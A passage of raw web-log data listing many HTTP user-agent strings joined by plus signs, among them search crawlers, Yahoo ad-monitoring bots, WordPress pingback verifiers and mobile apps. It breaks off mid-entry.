(compatible; Googlebot/2.1; +http://www.google.com/bot.html),gzip(gfe) +WordPress/5.2.12; http://g2nursery.com +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 5.0.1; SM-J727T1 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634688726-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634698546-0 +WordPress/5.8.1; https://3zacademy.com +WordPress/5.8.1; https://angularquestions.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775535-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786657-10 +Mozilla/5.0 (compatible; Google-Apps-Script; beanserver; +https://script.google.com; id: UAEmdDd-TAWwZA_2A0dR7D4uazGow5RprGA) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775556-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786658-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634777863-10 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1634783531-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634788816-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634797481-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634797484-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634812836-10 +WhatsApp/2.21.22.3 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634824764-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634832230-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634832379-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634832382-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634847616-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634781166-0 +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1634783584-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634792840-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634809637-0 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/538.19 (KHTML, like Gecko) JavaFX/8.0 Safari/538.19 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775532-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775559-0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 PTST/211020.154311 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786656-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786659-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775560-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786660-0 +ddg_android/5.98.1 (com.duckduckgo.mobile.android; Android API 25) +WordPress/5.8.1; https://bootpanic.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634775534-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634786657-0 +Apache-HttpClient/4.5.13 (Java/1.8.0_312) +GuzzleHttp/6.5.4 curl/7.58.0 PHP/7.2.24-0ubuntu0.18.04.2 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634938371-0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) adbeat.com/policy AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634891678-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634915251-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634921920-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634921924-10 +WhatsApp/2.21.21.12 A +Tiny Tiny RSS/21.10-377e0b8 (https://tt-rss.org/) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634932659-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634941393-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634867056-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634877749-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1634923506-0 +Mozilla/5.0 (X11; Linux x86_64; rv:92.0) adbeat.com/policy Gecko/20100101 Firefox/92.0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 4.4.4; SM-G600FY ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.1.3.1128 (SpeedMode; Proxy; Android 5.0; SM-J330G ) U2/1.0.0 Mobile +WhatsApp/2.21.22.5 A +Apache-HttpClient/4.5.10 (Java/1.8.0_181) +Mozilla/5.0 (compatible; bnf.fr_bot; +https://www.bnf.fr/fr/capture-de-votre-site-web-par-le-robot-de-la-bnf), XFF:194.199.7.28 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:93.0) adbeat.com/policy Gecko/20100101 Firefox/93.0 +Mozilla/4.0 (compatible; Globel; Traffic Sent From: http://www.directory.manandmollusc.net) +'DuckDuckBot-Https/1.1; (+https://duckduckgo.com/duckduckbot)' +Mozilla/5.0 (compatible; YandexAccessibilityBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4530.3 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634953834-0 +WordPress/5.8.1; https://share2x.com +WordPress/5.8.1; https://schneekrabbe.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1634965106-0 +WordPress/5.8.1; https://www.tech21century.com +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:40.77.167.33 +Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.79 +WordPress.com; http://cybersecurityn00b.com +Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm), XFF:157.55.39.79 +WordPress/5.8.1; http://daemax.ca; verifying pingback from 185.205.194.188 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635086571-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635088154-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635088177-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635100537-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635038504-0 +WordPress/5.8.1; https://www.naenote.net +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635047822-0 +WhatsApp/2.21.22.6 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635066999-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635069983-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635069996-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635073271-0 +WordPress/5.8.1; https://technika66.ru +FDM/6.15.3.4236 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.0.6.1040 (SpeedMode; Proxy; Android 5.1.1; SM-C111 ) U2/1.0.0 Mobile +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 8.1.0; GT-S5360 ) U2/1.0.0 Mobile +Mozilla/5.0 (Linux; Android 6.0.1; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4584.0 Mobile Safari/537.36 PTST/210331.204756 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.2.0.1125 (SpeedMode; Proxy; Android 6.0; LG-X230 ) U2/1.0.0 Mobile +WordPress/5.5.5; http://bigconstructions.co.id +ddg_android/5.99.0 (com.duckduckgo.mobile.android; Android API 30) +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.1.1138 (SpeedMode; Proxy; Android 9; SM-N910H ) U2/1.0.0 Mobile +Mozilla/5.0 compatible (X11; Linux x86_64) AppleWebkit/537.36 (KHTML, like Gecko; Google Wireless Transcoder) Chrome/55.0.2868.0 Safari/537.36 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.7.8.806 (SpeedMode; Proxy; Android 10; Nokia_2.3 ) U2/1.0.0 Mobile +WordPress/5.8.1; https://blackboardlist.com +WordPress.com; http://blackboardlist.com +WordPress.com; https://blackboardlist.com +WordPress/5.8.1; https://coursediscovery.com +WhatsApp/2.2140.12 N +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120930-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635130727-10 +WordPress/5.8; https://upardigital.uparsistem.edu.co; verifying pingback from 5.178.217.227 +WordPress/5.8; https://upardigital.uparsistem.edu.co; verifying pingback from 200.68.13.146 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120931-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635172579-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635172595-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635195596-10 +Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635125817-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635136624-0 +Mozilla/5.0 (X11; Linux x86_64; rv:93.0) adbeat.com/policy Gecko/20100101 Firefox/93.0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635178045-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120932-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120926-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/11.4.0.1180 (SpeedMode; Proxy; Android 8.0.0; SM-C111 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635130725-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635130728-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120933-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635130729-0 +WordPress.com; https://jalquiza711.wordpress.com +ddg_android/5.98.1 (com.duckduckgo.mobile.android; Android API 29) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1635121375-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635120929-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635130726-0 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML%2C like Gecko) BingPreview/1.0b +Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML%2C like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot) +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML%2C like Gecko) Chrome/81.0.4044.268 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Safari/605.1.15 (Applebot/0.1; +http://www.apple.com/go/applebot), XFF:17.121.115.150 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635207565-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219858-10 +WordPress/5.3.9; https://kpmglearningmalta.com; verifying pingback from 24.116.202.31 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635207566-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219859-10 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635210684-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635222523-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635224399-10 +WhatsApp/2.21.210.20 i +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635274488-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635213415-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635226305-0 +Iframely/1.6.1 (+https://metadata.xayn.com) +GoogleAuth/1.4 (ASUS_I001_1 QKQ1.190825.002); gzip,gzip(gfe),gzip(gfe) +Mozilla/5.0 (Windows NT 10.0; Win64; x64) adbeat.com/policy AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 OPR/79.0.4143.50 +WhatsApp/2.21.22.7 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635281937-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635282574-0 +UCWEB/2.0 (Java; U; MIDP-2.0; Nokia203/20.37) U2/1.0.0 UCMini/10.9.8.1006 (SpeedMode; Proxy; Android 5.0.2; Micromax_Q4101 ) U2/1.0.0 Mobile +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635207562-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635207568-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219859-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219895-0 +Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/94.0.4606.81 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/94.0.4606.81 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) +Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; +http://www.google.com/bot.html) Chrome/95.0.4638.54 Safari/537.36 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219860-0 +ddg_android/5.99.0 (com.duckduckgo.mobile.android; Android API 27) +WordPress/5.8.1; https://www.bankep.com +WordPress/5.8.1; https://bankep.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635207564-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635219857-0 +okhttp/3.12.1, XFF:45.248.162.186 +Riddler +Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.268, XFF:141.8.142.65 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635295412-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635306286-0 +WhatsApp/2.21.21.15 A +WordPress/5.8.1; https://examsocial.com +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635367719-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635293646-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303839-10 +WordPress/5.8.1; https://fundacionfaroccr.com +PHP/6.3.01 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635293647-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303840-10 +WordPress/5.7; https://www.econrio.com.br +WhatsApp/2.21.22.8 A +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635366529-10 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635299210-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635310906-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635313950-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-desktop/1635322017-0 +WhatsApp/2.21.21.17 A +NetSurf/3.10 (OpenBSD) +Mozilla/5.0 (compatible; Yahoo Link Preview; https://help.yahoo.com/kb/mail/yahoo-link-preview-SLN23615.html) maild/1635359640-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635293648-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) tands-prod-eng.hlfs-prod---sieve.hlfs-rest_client/1635303836-0 +Mozilla/5.0 (compatible; Yahoo Ad monitoring; https://help.yahoo.com/kb/yahoo-ad-monitoring-SLN24857.html) 